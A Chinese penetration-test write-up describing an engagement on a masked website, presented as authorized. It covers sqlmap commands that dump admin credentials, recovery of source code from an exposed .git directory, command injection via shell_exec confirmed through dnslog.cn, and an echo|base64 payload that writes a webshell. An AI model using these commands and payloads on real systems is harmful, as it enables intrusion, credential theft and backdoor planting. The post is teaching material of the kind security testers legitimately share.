渗透实战 | SQL注入的局限

  • A+
所属分类:安全文章
旧文重发:之前投稿到安译首发,现在重发申请一下原创。

 渗透实战 | SQL注入的局限

0x00 前言

曾经搞站最经典的套路就是:注入拿到密码进后台,上传shell然后内核提权。但是实际环境中,往往会有注入后密码解不开、找不到后台等情况,所以现在有的师傅说sql注入还不如xss


这里分享一个实际案例,在一次项目中遇到上述情况后我如何转变思路最终拿下目标。如有漏码少码导致能定位目标请师傅们手下留情,后台留言提醒必有红包重谢


 

0x01 详细步骤

1、网站界面就不放了,打码太累了,直接跳到随意点点后发现可疑参数,并确定存在漏洞的截图。


and 1=1页面显示正常,and 1=0页面变空白确定存在数字型注入,order by确定共4列,最后用select 1,2,3,4确定第2列回显。


渗透实战 | SQL注入的局限


2、之前探测发现没有waf,那就直接sqlmap一把梭。

【跑当前库名】:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --current-db【跑所有数据库名】:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --dbs【标绿色的为当前数据库】:xxx_history
渗透实战 | SQL注入的局限


3、跑当前数据库表名。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history --tables

标绿色的表为我认为是存放管理员数据的表:

渗透实战 | SQL注入的局限


4、直接拖管理表的数据。

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history -T administrators --dump


渗透实战 | SQL注入的局限

居然是明文密码,现在明文密码很少见了,不过考虑到目标网站有点历史悠久,也能理解。


5、虽然获得了管理员密码,但是找不到后台,常用的/admin、/login、/manage都试了。


渗透实战 | SQL注入的局限


6、用脚本扫目录,字典用的是御剑的标准字典。得到以下敏感目录(截图不全)。


渗透实战 | SQL注入的局限


7、.git目录存在即git源码泄露漏洞,用GitHack脚本恢复了整站源码,一大坨,截图就不放了,放个数字你们感受下。

python2 GitHack.py https://www.马赛克.com/.git/

渗透实战 | SQL注入的局限


8、根据名字确定其中疑似后台的目录:

渗透实战 | SQL注入的局限


9、访问试试,/admin1已经404了,因为git中留存的是历史代码,所以目录被改名或删除都有可能。

渗透实战 | SQL注入的局限


10、/7mysql7需要输入密码,试了不是之前注出的密码。


渗透实战 | SQL注入的局限


11、xxxquestions目录下的wp-admin倒是可以进,但是也不是之前注出的密码。

渗透实战 | SQL注入的局限


12、之前看到还有个xxx_questions数据库,再用sqlmap去跑一下试试:

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions --tables

渗透实战 | SQL注入的局限

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions -T wp_users --dump

渗透实战 | SQL注入的局限


13、这种加密是wordpress特有的加密,cmd5有针对该框架的解密,但是这个密码似乎太复杂,解不出。

渗透实战 | SQL注入的局限


14、至此sql注入后【有密码找不到后台、有后台解不开密码】的情况就都碰到了。渗透似乎陷入僵局,没关系,手里的源码还有利用价值,拖到D盾里自动审计一下。

渗透实战 | SQL注入的局限


15、访问那个级别5的已知后门,原来已经被人日过了,是个黑页:hacked by XXX。这个网站比较有历史了,可能这个黑页也是很多年前的某个娱乐圈黑客搞的。

渗透实战 | SQL注入的局限


16、访问级别4的shell_exec后门,是个空白页面,查看手中的源代码,发现是一个备份脚本,有可能是同行留的,也有可能是没有安全意识的管理员自己写的。后面那种可能性比较大。

渗透实战 | SQL注入的局限


17、脚本逻辑:接收了POST的filename参数,然后执行打包备份,但是参数传进shell_exec之前没有做过滤,产生了命令执行的漏洞。用linux的命令连接符分号,可以在后面拼接任意命令,这里尝试一下执行whoami,但是还是空白页面。

渗透实战 | SQL注入的局限


18、想到是因为shell_exec函数没有回显,也不知道命令执行成功没有,这里我们用公开免费的dnslog平台去接收没有回显的注入:http://www.dnslog.cn/,用法如下:

先点击Get SubDomain在平台获取一个域名

渗透实战 | SQL注入的局限


19、然后执行ping命令,反撇号中的命令会自动执行并返回命令执行的结果拼接到命令里,linux系统使用ping命令要加-c指定次数,不然会一直ping个没完。

渗透实战 | SQL注入的局限


20、去平台点击Refresh Record刷新(不要刷新整个网页),获取到解析日志。

渗透实战 | SQL注入的局限

可以看到命令是执行成功了的。whoami的回显为www-data

 

21、确认了漏洞存在,接下来利用漏洞写一句话,注意因为一句话中包含特殊字符,要编码后写入,payload如下

echo base64编码后的一句话|base64 -d > shell.php

(实战中不要用这个文件名,有授权的测试随便,但要注意文件名对waf来说也是一种特征)

渗透实战 | SQL注入的局限


22、写马成功

渗透实战 | SQL注入的局限

23、客户没有授权内网,项目结束。

渗透实战 | SQL注入的局限


0x02 后记

渗透实战 | SQL注入的局限
VX公众号:《小黑的安全笔记》

如有漏码少码导致能定位目标请师傅们手下留情,后台留言提醒必有红包重谢

如有漏码少码导致能定位目标请师傅们手下留情,后台留言提醒必有红包重谢

如有漏码少码导致能定位目标请师傅们手下留情,后台留言提醒必有红包重谢


END.


喵,点个赞再走吧~

本文始发于微信公众号(小黑的安全笔记):渗透实战 | SQL注入的局限

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: